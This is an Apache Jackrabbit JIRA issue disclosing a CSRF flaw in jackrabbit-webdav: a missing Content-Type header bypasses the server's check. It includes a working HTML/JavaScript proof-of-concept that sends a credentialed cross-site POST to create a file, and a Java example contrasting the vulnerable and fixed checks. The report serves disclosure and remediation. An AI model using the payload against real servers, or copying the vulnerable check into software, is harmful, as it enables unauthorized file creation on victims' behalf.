Dominique Jäggi created JCR-4002:
------------------------------------

             Summary: CSRF in Jackrabbit-Webdav using empty content-type
                 Key: JCR-4002
                 URL: https://issues.apache.org/jira/browse/JCR-4002
             Project: Jackrabbit Content Repository
          Issue Type: Bug
          Components: jackrabbit-webdav
    Affects Versions: 2.13.1
            Reporter: Dominique Jäggi
            Assignee: Dominique Jäggi
             Fix For: 2.13.2


As per [0] the CSRF content-type check does not include a null request content 
type. This can be exploited to create a resource via CSRF like so:

{code}
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
        // Send the victim's session cookies with the cross-site request.
        xhr.withCredentials = true;
        var body = "This file has been uploaded via CSRF.=\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        // A Blob with no type set produces a request without a Content-Type
        // header, which the server-side check described above does not reject.
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
{code}

I will mitigate this particular issue by including a null content type in the 
list of rejected content types.

[0] https://github.com/cryptomator/cryptomator/issues/319
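The defect and the fix described in this issue, reduced to a stand-alone check. This is an added illustration written for this page, not Jackrabbit's own CSRFUtil code: the method names and the exact contents of the rejected set are assumptions. It shows the vulnerable form of the content-type check, where a request that carries no Content-Type header at all slips past because null is never compared against the list, beside the hardened form that treats a missing header the same way as the form-submittable types.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class CsrfContentTypeCheck {

    // Content types that a plain HTML form or a no-preflight XMLHttpRequest can
    // send cross-origin. Requests carrying one of these are subject to the CSRF
    // rejection logic. (Set contents are an assumption for this illustration.)
    private static final Set<String> REJECTED_CONTENT_TYPES = new HashSet<>(Arrays.asList(
            "text/plain",
            "multipart/form-data",
            "application/x-www-form-urlencoded"));

    /**
     * Vulnerable variant (hypothetical name): a request with no Content-Type
     * header is never matched against the list and is therefore let through.
     */
    static boolean isRejectedVulnerable(String contentType) {
        if (contentType == null) {
            return false; // the gap exploited by the Blob-without-type PoC above
        }
        return REJECTED_CONTENT_TYPES.contains(normalize(contentType));
    }

    /**
     * Hardened variant (hypothetical name): an absent Content-Type is treated
     * exactly like the form-submittable types, i.e. it is rejected.
     */
    static boolean isRejectedFixed(String contentType) {
        if (contentType == null) {
            return true;
        }
        return REJECTED_CONTENT_TYPES.contains(normalize(contentType));
    }

    // Drop parameters such as "; charset=UTF-8" or "; boundary=..." and
    // lower-case the media type so the comparison is not trivially bypassed.
    private static String normalize(String contentType) {
        int semi = contentType.indexOf(';');
        String mediaType = semi >= 0 ? contentType.substring(0, semi) : contentType;
        return mediaType.trim().toLowerCase(Locale.ROOT);
    }

    public static void main(String[] args) {
        // Constructed sample header values, including the missing-header case.
        String[] samples = {
                null,
                "text/plain",
                "Multipart/Form-Data; boundary=----abc",
                "application/x-www-form-urlencoded",
                "application/json"
        };
        for (String ct : samples) {
            String label = (ct == null) ? "(no Content-Type header)" : ct;
            System.out.printf("%-42s vulnerable rejects=%-5b fixed rejects=%b%n",
                    label, isRejectedVulnerable(ct), isRejectedFixed(ct));
        }
    }
}
```

Running the class prints one line per sample; the only row where the two variants disagree is the missing header, which the vulnerable check accepts and the hardened check rejects. A client that wants to POST a body without any Content-Type and still be accepted has to satisfy whatever the server uses as its positive CSRF signal instead, which is the behaviour the fix in 2.13.2 restores.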

--
This message was sent by Atlassian JIRA
(v6.3.4#6332)